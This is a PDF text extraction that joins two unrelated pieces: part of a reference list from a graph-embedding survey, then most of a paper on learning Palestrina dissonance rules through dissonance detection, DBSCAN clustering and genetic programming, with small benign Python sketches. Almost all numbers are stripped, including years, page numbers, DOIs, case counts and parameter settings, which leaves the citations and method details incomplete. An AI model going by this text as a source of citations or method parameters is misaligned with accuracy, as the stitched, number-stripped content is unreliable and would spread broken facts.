deerwester s, dumais st, furnas gw, landauer tk, harshman r. . indexing by latent semantic analysis. journal of the american society for information science ( ): – doi . /(sici) - ( ) : < ::aid-asi > . .co; - . defferrard m, bresson x, vandergheynst p. . convolutional neural networks on graphs with fast localized spectral filtering. in: advances in neural information processing systems. – . devlin j, chang m-w, lee k, toutanova k. . bert: pre-training of deep bidirectional transformers for language understanding. arxiv preprint arxiv: . . didimo w, liotta g, montecchiani f. . a survey on graph drawing beyond planarity. acm computing surveys ( ): – doi . / . ding ch, he x, zha h, gu m, simon hd. . a min-max cut algorithm for graph partitioning and data clustering. in: proceedings ieee international conference on data mining. piscataway: ieee, – . ding m, tang j, zhang j. . semi-supervised learning on graphs with generative adversarial nets. in: proceedings of the th acm international conference on information and knowledge management. new york: acm, – . makarov et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /j.ins. . . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /nature http://dx.doi.org/ . /ci z http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /tkde. . https://arxiv.org/abs/ . http://dx.doi.org/ . /tvcg. . http://dx.doi.org/ . /(sici) - ( ) : % c ::aid-asi % e . .co; - https://arxiv.org/abs/ . http://dx.doi.org/ . / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ do dt, le tqt, le nqk. . using deep neural networks and biological subwords to detect protein s-sulfenylation sites. briefings in bioinformatics : doi . /bib/bbaa . dong y, chawla nv, swami a. . metapath vec: scalable representation learning for heterogeneous networks. in: proceedings of the rd acm sigkdd international conference on knowledge discovery and data mining. new york: acm, – . donnat c, holmes s. . tracking network dynamics: a survey using graph distances. annals of applied statistics ( ): – doi . / -aoas . donnat c, zitnik m, hallac d, leskovec j. . learning structural node embeddings via diffusion wavelets. proceedings of the th acm sigkdd international conference on knowledge discovery & data mining : – . duvenaud dk, maclaurin d, iparraguirre j, bombarell r, hirzel t, aspuru-guzik a, adams rp. . convolutional networks on graphs for learning molecular fingerprints. in: advances in neural information processing systems. cambridge: mit press, – . efron b. . bootstrap methods: another look at the jackknife. in: breakthroughs in statistics. berlin: springer international publishing, – . erdös p, rényi a. . on random graphs publ. publicationes mathematicae debrecen : – . ezzat a, wu m, li x-l, kwoh c-k. . drug-target interaction prediction using ensemble learning and dimensionality reduction. methods : – doi . /j.ymeth. . . . ezzat a, zhao p, wu m, li x-l, kwoh c-k. . drug-target interaction prediction with graph regularized matrix factorization. ieee/acm transactions on computational biology and bioinformatics ( ): – doi . /tcbb. . . fan m, zhou q, chang e, zheng tf. . transition-based knowledge graph embedding with relational mapping properties. proceedings of the th pacific asia conference on language, information and computing : – . fang h, wu f, zhao z, duan x, zhuang y, ester m. . community-based question answering via heterogeneous social network learning. in: thirtieth aaai conference on artificial intelligence. – . fathy a, li k. . 
temporalgat: attention-based dynamic graph representation learning. in: lauw hw, wong rc-w, ntoulas a, lim e-p, ng s-k, pan sj, eds. advances in knowledge discovery and data mining. cham: springer international publishing, – . feng r, yang y, hu w, wu f, zhang y. . representation learning for scale-free networks. in: thirty-second aaai conference on artificial intelligence. fey m, eric lenssen j, weichert f, müller h. . splinecnn: fast geometric deep learning with continuous b-spline kernels. in: proceedings of the ieee conference on computer vision and pattern recognition. piscataway: ieee, – . fortunato s. . community detection in graphs. physics reports ( – ): – doi . /j.physrep. . . . fu x, zhang j, meng z, king i. . magnn: metapath aggregated graph neural network for heterogeneous graph embedding. in: proceedings of the web conference , www ’ . new york: association for computing machinery, – . gallicchio c, micheli a. . fast and deep graph neural networks. in: aaai. – . ganguly s, gupta m, varma v, pudi v. . et al.author vec: learning author representations by combining content and link information. in: proceedings of the th international conference companion on world wide web. – . makarov et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /bib/bbaa http://dx.doi.org/ . / -aoas http://dx.doi.org/ . /j.ymeth. . . http://dx.doi.org/ . /tcbb. . http://dx.doi.org/ . /j.physrep. . . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ gao f, musial k, cooper c, tsoka s. . link prediction methods and their accuracy for different social networks and network metrics. scientific programming ( ): – doi . / / . gao j, zhang t, xu c. . graph convolutional tracking. in: cvpr. gao s, denoyer l, gallinari p. . temporal link prediction by integrating content and structure information. in: proceedings of the th acm international conference on information and knowledge management, cikm ’ . new york: acm, – . geng x, zhang h, bian j, chua t-s. . learning image and user features for recommendation in social networks. in: proceedings of the ieee international conference on computer vision. piscataway: ieee, – . getoor l, taskar b. . statistical relational learning. https://mitpress.mit.edu/books/ introduction-statistical-relational-learning. gilmer j, schoenholz ss, riley pf, vinyals o, dahl ge. . neural message passing for quantum chemistry. in: proceedings of the th international conference on machine learning-volume . – . golub gh, reinsch c. . singular value decomposition and least squares solutions. in: linear algebra. berlin: springer, – . goyal p, chhetri sr, canedo a. . dyngraph vec: capturing network dynamics using dynamic graph representation learning. knowledge-based systems : doi . /j.knosys. . . . goyal p, ferrara e. . graph embedding techniques, applications, and performance: a survey. arxiv preprint arxiv: . . goyal p, hosseinmardi h, ferrara e, galstyan a. . embedding networks with edge attributes. in: proceedings of the th on hypertext and social media. new york: acm, – . grover a, leskovec j. . node vec: scalable feature learning for networks. proceedings of the nd acm sigkdd ic on kdd : – . gui h, liu j, tao f, jiang m, norick b, han j. . large-scale embedding learning in heterogeneous event data. in: ieee th international conference on data mining (icdm). piscataway: ieee, – . guo z, zhang y, lu w. . attention guided graph convolutional networks for relation extraction. 
in: proceedings of the th annual meeting of the association for computational linguistics. florence: association for computational linguistics, – . haddad m, bothorel c, lenca p, bedart d. . temporalnode vec: temporal node embedding in temporal networks. in: international conference on complex networks and their applications. berlin: springer international publishing, – . hamilton w, ying z, leskovec j. a. inductive representation learning on large graphs. in: advances in nips. cambridge: mit press, – . hamilton wl, ying r, leskovec j. b. representation learning on graphs: methods and applications. arxiv preprint arxiv: . . hasan ma, zaki mj. . a survey of link prediction in social networks, chapter . boston: springer us, – . hayashi k, ohsaki m. . reinforcement learning and graph embedding for binary truss topology optimization under stress and displacement constraints. frontiers in built environment : doi . /fbuil. . . makarov et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . / / https://arxiv.org/abs/https://mitpress.mit.edu/books/introduction-statistical-relational-learning https://arxiv.org/abs/https://mitpress.mit.edu/books/introduction-statistical-relational-learning http://dx.doi.org/ . /j.knosys. . . https://arxiv.org/abs/ . https://arxiv.org/abs/ . http://dx.doi.org/ . /fbuil. . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ he q, pei j, kifer d, mitra p, giles l. . context-aware citation recommendation. in: proceedings of the th international conference on world wide web, www ’ . new york: acm, – . he s, liu k, ji g, zhao j. . learning to represent knowledge graphs with gaussian embedding. proceedings of the th acm international on conference on information and knowledge management : – . he x, niyogi p. . locality preserving projections. in: advances in neural information processing systems. – . heckerman d, meek c, koller d. . probabilistic entity-relationship models, prms, and plate models. in: introduction to statistical relational learning. – . henaff m, bruna j, lecun y. . deep convolutional networks on graph-structured data. arxiv preprint arxiv: . . herman i, melançon g, marshall ms. . graph visualization and navigation in information visualization: a survey. ieee transactions on visualization and computer graphics ( ): – doi . / . . hettige b, wang w, li y-f, buntine w. . robust attribute and structure preserving graph embedding. in: pacific-asia conference on knowledge discovery and data mining. berlin: springer, – . hong h, lin y, yang x, li z, fu k, wang z, qie x, ye j. . heteta: heterogeneous information network embedding for estimating time of arrival. in: proceedings of the th acm sigkdd international conference on knowledge discovery & data mining, kdd ’ . new york: association for computing machinery, – . hou c, nie f, tao h, yi d. . multi-view unsupervised feature selection with adaptive similarity and view weight. ieee transactions on knowledge and data engineering ( ): – doi . /tkde. . . hu b, fang y, shi c. . adversarial learning on heterogeneous information networks. in: proceedings of the th acm sigkdd international conference on knowledge discovery & data mining, kdd ‘ . new york: association for computing machinery, – . huang x, li j, hu x. . label informed attributed network embedding. in: proceedings of the tenth acm international conference on web search and data mining. new york: acm, – . huang x, zhang j, li d, li p. . knowledge graph embedding based question answering. 
Machine Learning of Symbolic Compositional Rules with Genetic Programming: Dissonance Treatment in Palestrina

Torsten Anders and Benjamin Inden
School of Media Arts and Performance, University of Bedfordshire, Luton, Bedfordshire, UK
Department of Computer Science and Technology, Nottingham Trent University, Nottingham, UK

Abstract

We describe a method for automatically extracting symbolic compositional rules from music corpora. Resulting rules are expressed by a combination of logic and numeric relations, and they can therefore be studied by humans. These rules can also be used for algorithmic composition, where they can be combined with each other and with manually programmed rules. We chose genetic programming (GP) as our machine learning technique because it is capable of learning formulas consisting of both logic and numeric relations. GP was never used for this purpose before, to our knowledge. We therefore investigate a well-understood case in this study: dissonance treatment in Palestrina's music. We label dissonances with a custom algorithm, automatically cluster melodic fragments with labelled dissonances into different dissonance categories (passing tone, suspension, etc.) with the DBSCAN algorithm, and then learn rules describing the dissonance treatment of each category with GP. Learning is based on the requirement that rules must be broad enough to cover positive examples, but narrow enough to exclude negative examples. Dissonances from a given category are used as positive examples, while dissonances from other categories, melodic fragments without dissonances, purely random melodic fragments, and slight random transformations of positive examples are used as negative examples.

Subjects: Artificial Intelligence, Data Mining and Machine Learning, Multimedia
Keywords: counterpoint, rule learning, Palestrina, genetic programming, clustering, algorithmic composition, dissonance detection, computer music

Introduction

Artificial intelligence methods have been used for decades to model music composition (Fernández & Vico, ). Two general approaches have attracted particular attention, as they mimic two aspects of how humans learn to compose. Firstly, rules have been used for centuries for teaching composition. Some algorithmic composition methods model symbolic knowledge and rules, for example, constraint-based approaches and formal grammars. Secondly, composers learn from examples of existing music. Machine learning (ML) methods of algorithmic composition include Markov chains and artificial neural networks.
We aim at combining these two approaches by automatically learning compositional rules from music corpora. We use genetic programming (GP) (Poli, Langdon & McPhee, ) for that purpose. The resulting rules are represented symbolically, and can thus be studied by humans (in contrast to, say, artificial neural networks), but the rules can also be integrated into algorithmic composition systems. Extracting rules automatically is useful, for example, for musicologists to better understand the style of certain corpora, and for composers who use computers as a creative partner (computer-aided composition). For computer scientists, it is a challenging application domain.

The resulting rules can be used in existing rule-based approaches to algorithmic composition where multiple rules can be freely combined, for example, in constraint-based systems (Anders & Miranda, ). Rules derived by ML and rules programmed manually can be freely combined in such systems, and rules can address various aspects (e.g. rules on rhythm, melody, harmony, voice leading, and orchestration). Potentially, ML can be used to derive rules from a given corpus of music for aspects where we do not have rules yet, for example, how to rhythmically and melodically shape the development of a phrase in a certain style.

This article describes a pilot project within the research programme described above. In this pilot, we automatically extract rules for the treatment of dissonances in Renaissance music using a corpus of movements from Palestrina masses. The treatment of such dissonances is rather well understood, which helps in evaluating results. Nevertheless, this task is far from trivial, as it has to take various musical viewpoints into account (e.g. melodic interval sizes and directions, note durations, and metric positions). Results can be interesting and useful not only for musicologists and composers, but also for the commercially relevant field of music information retrieval, to advance the still unsolved problem of automatic harmonic analysis of polyphonic music.

Background

Inductive logic programming

Symbolic compositional rules have been extracted by ML before, specifically with inductive logic programming (ILP). ILP (Muggleton et al., ) combines logic programming with ML in order to learn first-order logic formulas from examples. Background knowledge expressed in logic programmes can be taken into account. ILP has been used for several musical applications. Closely related to our goal is the work of Morales & Morales ( ). Their system learnt standard counterpoint rules on voice leading, namely how to avoid open parallels.
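To give a flavour of the kind of output such systems produce, a voice-leading rule can be written as a first-order logic formula. The following formulation of the familiar prohibition of parallel perfect fifths is a hypothetical illustration only; the predicate names and the semitone encoding are our own assumptions and are not taken from Morales & Morales:

\[
\forall t_1, t_2:\ \mathit{successive}(t_1, t_2) \wedge \mathit{harmonicInterval}(t_1, 7) \wedge \mathit{harmonicInterval}(t_2, 7) \wedge \mathit{bothVoicesMove}(t_1, t_2) \rightarrow \mathit{violation}(t_1, t_2)
\]

Here 7 denotes the perfect fifth in semitones, and the formula marks two successive time points where both voices move while the interval remains a fifth, which forces parallel motion.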
other musical applications of ilp include the learning of harmonic rules that express differences between two music corpora, specifically beatles songs (pop music) and the real book (jazz) (anglade & dixon, ), and music performance rules for piano (tobudic & widmer, ) and violin (ramirez et al., ). numeric relations are difficult to deduce with ilp, as logic programming in general is very restricted in expressing numeric relations. we are specifically interested in also learning numeric relations besides logic relations, because our experience with anders and inden ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ constraint-based modelling of music composition makes us aware of their importance for compositional rules. for example, the size of melodic and harmonic intervals is important, and such quantities are best expressed numerically. besides, we want to use learnt rules later with constraint programming, a programming paradigm with very good support for restricting numeric relations. genetic programming in this project we therefore use another approach. gp is a particular kind of evolutionary algorithm that is used for ml. in gp, a tree structure is learnt by repeated application of random changes (mutation and recombination) and by the selection of the best structures among a set of candidates (a population) according to some criterion. a candidate tree can be the representation of a computer program or a mathematical equation among other possibilities. early seminal work on gp has been published by koza ( ), a more recent practical introduction can be found in poli, langdon & mcphee ( ). a particularly important application of gp is symbolic regression. symbolic regression infers a mathematical expression that best fits the given data. the mathematical expression is unrestricted except that a specified set of building blocks is used–operators like +, or standard mathematical functions. the trees that gp builds from these building blocks are representations of such mathematical expressions. symbolic regression is a powerful method that has been used in various areas of science and engineering (poli, langdon & mcphee, ), including a high-profile study where it was used to automatically deduce physical laws from experiments (schmidt & lipson, ). genetic programming has been used for music composition before. spector & alpern ( ) propose a system that automatically generates computer programmes for composing four-measure bebop jazz melodies. the generated programmes combine a number of given functions, inspired by jazz literature, that transform short melodies from charlie parker in various ways. the fitness of each programme is evaluated by a set of restrictions inspired by baker ( ), which measure the balance of different aspects (e.g. tonal and rhythmic novelty). johanson & poli ( ) also propose a system that creates computer programmes for transforming short melodies, but they allow users to interactively rate the quality of the generated music. this proved a tedious process for users. therefore they complement the user-rating with automatic fitness raters that learn from the user ratings. previous applications of gp for music composition thus aimed at modelling the full composition process, where the fitness function had to judge the quality of the resulting music. yet, the programmes resulting from the evolutionary algorithm are rather short, and they are thus limited in the compositional knowledge they can represent. 
previous work therefore composed music by transforming pre-existing music. instead, we are interested in learning compositional rules with gp that describe only a certain aspect of the resulting music. such rules are relevant in their own right as a representation of compositional knowledge that can be complemented with further anders and inden ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ musical knowledge, for example, in music constraint programming systems with manually encoded musical rules. in this situation, the fitness function does not need to judge musical quality. instead, it only needs to estimate how well the resulting rule fits the given positive examples and avoids the negative examples. as far as we know, gp has not yet been used for learning symbolic compositional rules, and therefore in this study we focus on a relatively well understood class of rules. dissonances in palestrina’s music this project studies the dissonance treatment in palestrina counterpoint with ml by automatically generating multiple symbolic rules that each constrain the treatment of a specific dissonance category (passing tones, suspensions etc.). jeppesen ( ), the seminal authority on palestrina counterpoint, distinguishes three roles a dissonance can play in his music. some dissonances are hardly noticeable on a weak beat used for connecting notes in smooth melodic lines (jeppesen calls them dissonances as a secondary phenomenon); others occur at an accented beat and are clearly heard (dissonances as primary phenomenon); and finally—more rarely—dissonances can be used for an expressive effect. as an example, fig. shows an excerpt from a palestrina mass movement with several dissonance categories in close proximity. all dissonances are marked with a crossed notehead, and are labelled with their dissonance category. passing tones (p.t.) and neighbour tones (n.t.) are short notes on a weak beat that link melodic tones (secondary phenomenon). by contrast, suspensions (s.) stand out; they occur on a strong beat and typically at longer notes. the five standard dissonance categories taught in palestrina counterpoint classes are passing tone, neighbour tone, suspension, anticipation and cambiata (jeppesen, ). traditionally, these categories are introduced progressively in class for pedagogic reasons in so-called species counterpoint, for example, in the textbook by fux ( ), which is still widely used. figure palestrina excerpt with several dissonances: several passing tones (p.t.), a neighbour tone (n.t.), and a suspension (s.), from the agnus of missa de beata marie virginis (ii), measures – . full-size doi: . /peerj-cs. /fig- the excerpt is from the agnus of missa de beata marie virginis (ii), which is agnus_ .krn in the music corpus, and stems from humdrum. see also footnote . anders and inden ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ an algorithm for automatically identifying dissonances in renaissance counterpoint has been proposed by patrick & strickler ( ), but it implements knowledge on the standard dissonance categories and therefore we instead developed a custom algorithm. the actual music of palestrina contains further dissonance categories, as shown by computational analysis (sigler, wild & handelman, ). counterpoint composition has often been modelled in a rule-based way, together with the relevant dissonance treatment. 
already the composition illiac suite, commonly recognised as the first computer-generated composition, implemented for its second experiment and movement four-part first species counterpoint with rules similar to renaissance counterpoint rules (hiller & isaacson, ). as a model for first species counterpoint, this early work sidestepped the issue of dissonance treatment, though, by simply not allowing for any dissonances. ebcioglu ( ) proposed a system that implemented two-part florid counterpoint to a given cantus firmus with rules inspired by renaissance counterpoint that stem from joseph marx and charles koechlin and are complemented by rules of the author. standard dissonance categories like passing tones, neighbour tones and suspensions are implemented, and published results attest to the musical quality of the output. schottstaedt ( ) followed the palestrina counterpoint rules of fux ( ) very faithfully and implemented all of fux’ five species for up to six voices with own rules added to get closer to fux’ actual examples. methods for learning symbolic compositional rules we use a novel methodology that combines multiple established approaches. at first, dissonant notes are automatically labelled in a corpus of music by palestrina with a custom algorithm. these dissonances are then automatically clustered into different dissonance categories (passing notes, suspensions etc.) with the clustering algorithm dbscan (ester et al., ). finally, a rule is learnt for each of these categories with gp. each rule states conditions that must hold between three consecutive melodic notes if the middle note is a dissonance. the rest of this section describes each of these steps in more detail. annotation of dissonances a custom algorithm for dissonance detection in renaissance music as a first step we automatically label dissonances in the music using a custom algorithm implemented with the music analysis environment music (cuthbert & ariza, ). for our purposes, it is better for the algorithm to leave a few complex dissonance categories undetected than to wrongly mark notes as dissonances that are actually not dissonant. note that this algorithm does not implement any knowledge of the dissonance categories known to occur in palestrina’s music. the analysis first ‘chordifies’ the score, that is, it creates a homorhythmic chord progression where a new chord starts whenever one or more notes start in the score, and each chord contains all the score notes sounding at that time. the result of the ‘chordification’ process on its own would loose all voice leading information (e.g. where voice crossing happens), but our algorithm processes those chords and the original anders and inden ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ polyphonic score in parallel and therefore such information is retained. the algorithm tracks which score notes form which chord by accessing the notes with the same start time (music parameter offset) as a given chord. the algorithm then loops through the chords. if a dissonant chord is found, it tries to find which note(s) make it dissonant by testing whether the chord becomes consonant if the pitches of these note(s) are removed. dissonances are more likely to occur on short notes in palestrina, and sometimes multiple dissonant tones occur simultaneously. the algorithm tests whether individual notes (and pairs of simultaneously moving notes) are dissonant. 
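the core of this chordify-and-test procedure can be sketched in a few lines of python with the music21 toolkit. the snippet below is a minimal sketch only: the input path is illustrative, and the ordering by duration, the note-pair testing and the suspension handling described in this section are omitted.

```python
# minimal sketch of the chordify-and-test idea, assuming the music21 toolkit;
# the input path is illustrative, and note-pair testing, duration limits and
# suspension handling are omitted.
from music21 import converter, chord

score = converter.parse('agnus_example.krn')        # hypothetical score file
chords = score.chordify().flatten().getElementsByClass(chord.Chord)

dissonant_spots = {}                                 # offset -> pitches whose removal restores consonance
for c in chords:
    if c.isConsonant():
        continue
    culprits = []
    for p in c.pitches:
        remaining = [q for q in c.pitches if q is not p]
        # a single leftover pitch is trivially consonant, so require at least two
        if len(remaining) >= 2 and chord.Chord(remaining).isConsonant():
            culprits.append(p)
    if culprits:
        dissonant_spots[c.offset] = culprits         # offsets are later used to find the matching score notes
```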
the algorithm progresses in an order that depends on the notes’ duration and a parameter max pair dur, which specifies the maximum duration of note pairs tested (in our analysis max pair dur equalled to a half note). in order to minimise mislabelling dissonances, the algorithm first tests all individual notes with a duration up to max pair dur in increasing order of their duration; then all note pairs in increasing order of their duration; and finally remaining individual notes in order of increasing duration. suspensions are treated with special care. remember that the algorithm processes the ‘chordified’ score and the actual score in parallel. as a preprocessing step, the algorithm merges tied score notes into single notes to simplify their handling. when the algorithm then loops through the chords and finds a dissonant note that started before the currently tested chord, it splits that note into two tied notes, and only the second note starting with the current chord is marked as dissonant. in order to avoid marking notes wrongly as dissonances, the algorithm does not test the following cases: any note longer than max diss dur, a given maximum dissonance duration (we set it to a whole note); and any suspension where the dissonant part of the note would exceed the preceding consonant part, or it would exceed max diss dur. for this pilot we arbitrarily selected the first agnus mass movements from the full corpus of palestrina music that ships with music . all examples in that subcorpus happen to be in ‘metre’ (tempus imperfectum, denoted with cut half circle), but our method does not depend on that. evaluation of the dissonance detection algorithm we evaluated results by manually ‘eyeballing’ a sample of scores with marked dissonances. the dissonance detection appears to work rather well; only very few notes were found wrongly labelled as a dissonance during our manual examination. figure shows an example where dissonances would not be correctly labelled by our algorithm. the first two passing tones (eighth notes) are correctly labelled in fig. , but our algorithm would instead label the d in the soprano as a dissonance. the problem here is that when the two correct dissonances are removed, the resulting ‘chord’ a–d is a fourth, which is still considered a dissonance in renaissance music. instead, if the soprano d is removed, the remaining chord c–a happens to be consonant. also, sometimes a suspension is not correctly recognised and instead a wrong note is labelled, where the voice proceeds by a skip in shorter notes. a dissonant chord is any chord for which music ’s chord.isconsonant() returns false. that function checks for two pitches whether the interval is a major or minor third, sixth or perfect fifth, and for three pitches whether the chord is a major or minor triad that is not in second inversion. casimiri edition (da palestrina, ), encoded by john miller and converted to humdrum by bret aarden. unfortunately, we have no way to auto- matically estimate the quality of our dissonance detection. nevertheless, the interested reader can confirm in music notation the quality of the dissonance detection by examining the results in the data for this paper (available under digital object identifier (doi) . /zenodo. ) in the folder preprocessing results, which includes musicxml files of all pieces we used, and where detected dissonances are marked by x-shaped note heads. anders and inden ( ), peerj comput. sci., doi . /peerj-cs. / https://doi.org/ . /zenodo. http://dx.doi.org/ . /peerj-cs. 
https://peerj.com/computer-science/ to be on the safe side for our purposes of learning dissonance treatment, the algorithm therefore does not label all dissonances. for example, occasionally more than two dissonances occur simultaneously in palestrina, for example, when three parts move with the same short rhythmic values or in a counterpoint of more than four voices. if the algorithm does not find tones that, when removed, leave a consonant chord, then no note is labelled as a dissonance (though the chord is marked for proofreading). excluding dissonances with the parameter max diss dur avoided a considerable number of complex cases and otherwise wrongly labelled notes. due to these precautions (avoiding wrongly labelled dissonances), due to the corpus (selected agnus movements) and the frequency of certain dissonance categories in that corpus, only a subset of the standard dissonance categories were detected and learnt as rules in this project (see table ). this point is further discussed below in the section on the evaluation of the clustering. also, because the wrongly labelled dissonances are relatively rare and do not show regular patterns, the cluster analysis sorts these cases into an outlier category, which we did not use for rule learning, further improving the quality of the marked dissonance collections. data given to machine learning instead of handing the ml algorithm only basic score information (e.g. note pitches and rhythmic values), we provide it with background knowledge (like melodic intervals and accent weights as described below), and that way guide the search process. for flexibility, we considered letting the ml algorithm directly access the music score data with a set of given interface functions (methods), but extracting relevant score information in advance is more efficient. once dissonances are annotated in the score, only melodic data is needed for the clustering and later the ml. for simplicity we only used dissonances surrounded by two consonant notes (i.e. no consecutive dissonances like cambiatas). in order to control the differences in ‘key’ between pieces in the corpus, our algorithm computes ‘normalised pitch classes’, where is the tonic of the piece, a semitone above the tonic and so forth. for this purpose we need to compute the ‘key’ of each piece. we are not aware of any algorithm designed for classifying renaissance modes, and we therefore settled on instead using the krumhansl-schmuckler key determination algorithm (krumhansl, ) with simple key correlation weightings by sapp ( ). table the features of the automatically derived clusters match traditional dissonance categories. cluster dissonance category st interval nd interval metric position duration c passing tones down step down step down weak beat up to half note c passing tones up step up step up weak beat up to half note c suspension on beat repetition step down strong beat quarter or half note c suspension on beat repetition step down very strong beat quarter or half note c lower neighbour tone step down step up weak beat up to half note interested readers can investigate the unlabelled dissonances in music nota- tion. in the musicxml files mentioned in the previous footnote, the result of the ‘chordification’ process is included as an additional stave and all dissonances are always labelled in that stave. if the staves of the actual voices do not contain any simultaneous note with x-shaped note head, then that dissonance is not labelled in the score. anders and inden ( ), peerj comput. 
sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ while this approach is not able to recognise modes, it is at least able to control the differences in accidentals between pieces. we determine accent weights using music ’s function getaccentweight, where the strongest beat on the first beat of a measure has the weight . ; strong beats within a measure (e.g. the third beat in ‘metre’) the weight . ; the second and fourth beat in metre the weight . and so on (ariza & cuthbert, ). intervals are measured in semitones, and durations in quarter note lengths of music , where means a quarter note, a half note and so on. for simplicity we left ties out in this pilot. suspensions are simply repeated tones, they are not tied over. cluster analysis of dissonance categories analysis with dbscan algorithm for each dissonance, we provide the clustering algorithm with the following features: the sum of the durations of the previous, current, and next note (the reason for including this feature instead of including all note durations is explained in the following ‘discussion’ section); the melodic interval from the previous note (measured in semitones), and the interval to the next note; the ‘normalised’ pitch class of the dissonance (i.e. is the ‘tonic’ etc.); and the accent weight of the dissonance. before clustering, all data for each feature is normalised such that its mean is . and its standard deviation is . . the data is clustered using the dbscan algorithm (ester et al., ) as implemented in the scikit-learn library (pedregosa et al., ). this clustering algorithm does not require setting the number of clusters in advance, and can find clusters of arbitrary shape as it is based on the density of points. here, we set the minimum number of neighbours required to identify a point as a core cluster point to , and the maximum neighbour distance to . based on initial runs and the desire to keep the number of clusters in a reasonable range. points that lie in low density regions of the sample space are recognised as outliers by dbscan, and are ignored in the subsequent rule learning step. clustering results and discussion in order to evaluate the clustering results, we automatically labelled each dissonance in the score with its dissonance category (cluster number), and then created a new score for each cluster number into which all short melodic score snippets that contain this dissonance were collected (one-measure snippets, except where the dissonance occurs at measure boundaries). we then evaluated the clustering results by eyeballing those collections of score snippets . initially, the importance of note durations for the clustering was rated too highly, because the clustering took more duration parameters into account (one for every note) than other parameters (e.g. pitch intervals between notes). as a result, one cluster contained primarily dissonances at half notes and another dissonances at shorter notes, which was not useful for our purposes. therefore, we aggregated the duration information, and adjusted the dbscan parameters as described above, after which clustering worked very well. as future work, it might be worth exploring whether the low-complexity weights that sapp proposed for major and minor—basically assigning to all non-scale degrees and to all scale degrees, but to the tonic and fifth— could be adapted for renaissance modes by assigning to their respective tonics (and the fifths as appropriate). 
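the clustering step itself is compact when written with scikit-learn. the sketch below assumes the per-dissonance feature rows (summed duration of the three notes, the two melodic intervals, normalised pitch class, accent weight) have already been extracted; the eps and min_samples values are illustrative placeholders rather than the exact settings used here.

```python
# sketch of the clustering step with scikit-learn; feature extraction is assumed to
# have happened already, and eps/min_samples are illustrative values only.
import numpy as np
from sklearn.preprocessing import StandardScaler
from sklearn.cluster import DBSCAN

X = np.asarray(dissonance_features, dtype=float)   # shape (n_dissonances, 5), built beforehand
X = StandardScaler().fit_transform(X)              # per-feature mean 0 and standard deviation 1

labels = DBSCAN(eps=0.5, min_samples=10).fit_predict(X)

# dbscan marks low-density points with label -1; those outliers are dropped before rule learning
clusters = {c: np.flatnonzero(labels == c) for c in set(labels) if c != -1}
```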
the clustering results, along with all algorithms created, can also be found in the supplemental data, doi: . /zenodo. . anders and inden ( ), peerj comput. sci., doi . /peerj-cs. / https://doi.org/ . /zenodo. http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ in the selected corpus only the following main dissonance categories are found: passing tones downwards on a weak beat ( cases); passing tones upwards on a weak beat ( cases); suspensions on the strong beat in ‘metre’ ( cases); suspensions on the strong beat ( cases); and lower neighbour tones on a weak beat ( cases). table summarises the distinguishing features of the dissonance categories as found in clusters c –c , for which we learnt rules. each row in the table describes a separate dissonance category as recognised by the clustering algorithm. the first interval indicates the melodic interval into the dissonance, and the second the interval from the dissonance to the next note. metric position and duration are features of the dissonant note itself. other dissonance categories like upper neighbour tones, anticipations and cambiatas do not occur in the ml training set. either they do not exist in the first agnus mass movements of the music palestrina corpus that we used, or they were excluded in some way. we only use dissonances surrounded by consonances (which excludes cambiatas). also, we did not use the set of outliers ( cases), which as expected, has no easily discernible common pattern. among these outliers are wrongly labelled dissonances, upper neighbour tones, and a few further cases of the above main categories. there are also two small further clusters with lower neighbour tones (c , cases), and passing tones upwards (c , cases) that were discarded as they were considered to be too small, and cover categories that are already covered by larger clusters. learning of rules training set to initiate rule learning, our algorithm compiles for each identified cluster (dissonance category) a set of three-note-long learning examples with a dissonance as middle note. all dissonances that have been assigned to that particular cluster are used as positive examples. then, four sets of negative examples are generated. note that the generation of negative examples does not take any knowledge about the problem domain into account. a similar approach can also be used for learning rules on other musical aspects. the first set is a random sample of dissonances that have been assigned to other clusters. the second set is a random sample of three-tone-examples without any dissonance taken from the corpus. the third set consists of examples where all features are set to random values drawn from a uniform distribution over the range of possible values for each feature. the fourth set consists of slightly modified random samples from the set of positive examples. two variations are generated for each chosen example. firstly, either the interval between the dissonant tone and the previous note or the interval to the next note is changed by ± semitones (with equal probabilities). secondly, one of the three note durations is either halved or doubled (with equal probabilities). both modifications are stored separately in the fourth set of negative examples. the algorithm aims to create % of the number of positive examples for each set of negative examples, but will generate at least examples ( for the first set due to possible low availability of these examples) and at most . 
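the fourth set of negative examples can be generated roughly as sketched below. the feature names and the two-semitone shift are assumptions made for illustration; the exact shift and the set-size caps used in the study are not reproduced here.

```python
# sketch of generating the fourth negative-example set (slightly modified positives);
# feature names, the interval shift and the sampling are illustrative assumptions.
import random

INTERVAL_SHIFT = 2   # semitones; placeholder value

def perturb(example):
    """return two negative variants of a positive example (a dict of the seven features)."""
    # variant 1: shift one of the two melodic intervals up or down
    v1 = dict(example)
    key = random.choice(['interval_pre', 'interval_succ'])
    v1[key] += random.choice([-INTERVAL_SHIFT, INTERVAL_SHIFT])
    # variant 2: halve or double one of the three note durations
    v2 = dict(example)
    key = random.choice(['duration_prev', 'duration_i', 'duration_next'])
    v2[key] *= random.choice([0.5, 2.0])
    return v1, v2

# positive_examples is assumed to hold the current cluster's positive examples
negatives_set4 = [variant for ex in positive_examples for variant in perturb(ex)]
```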
